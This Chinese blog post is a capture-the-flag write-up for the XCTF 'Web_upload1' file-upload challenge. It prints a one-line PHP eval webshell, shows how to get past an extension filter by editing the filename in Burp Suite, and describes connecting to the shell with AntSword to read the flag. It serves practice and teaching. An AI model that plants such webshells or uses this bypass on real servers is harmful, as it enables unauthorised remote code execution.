攻防世界之Web_upload1
题目:
本题考查的是文件上传漏洞。
上传一句话木马。
桌面新建一个webshell.php文本文件,写入<?php @eval($_POST['pass']);?>保存。
点击浏览,选择webshell.php上传。然后发现做了文件格式的限制,问题不大。将Burpsuite开启抓包,并把webshell.txt改为webshell.jpg
再次上传。
发现上传成功,并且知道在upload/1645624908.webshell.jpg位置
看看burpsuite抓到的包
将包右键发送到重发器Repeater上,改包重发。
将文件名webshell.jpg重新改为webshell.php点击Send发送。发现发送成功。可以点Response的Render查看。
发现上传成功.
知道路径upload/1645626892.webshell.php,我们访问查看一下
发现没报错,php文件已经上传成功。
上传成功后,我们就可以利用工具直接获得webshell。我这用蚁剑。
打开蚁剑。
空白地方点击右键,添加数据。
URL填入上传成功的地址http://111.200.241.244:54027/upload/1645626892.webshell.php,连接密码就是一句话木马中POST上传的参数,这里是pass.
填完后测试连接,连接成功后点添加数据就可以看到数据管理有一条数据,双击它就ok。
发现目录,然后就能随意逛找到flag。
在html层找到了flag.php,选中双击打开。
成功找到flag。
posted on 2022-02-23 22:48 shacker_shen 阅读(171) 评论(0) 编辑 收藏 举报